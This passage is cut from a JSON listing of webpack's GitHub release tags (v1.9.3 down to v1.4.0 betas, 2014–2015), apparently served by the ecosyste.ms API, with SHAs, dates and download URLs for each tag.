i/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G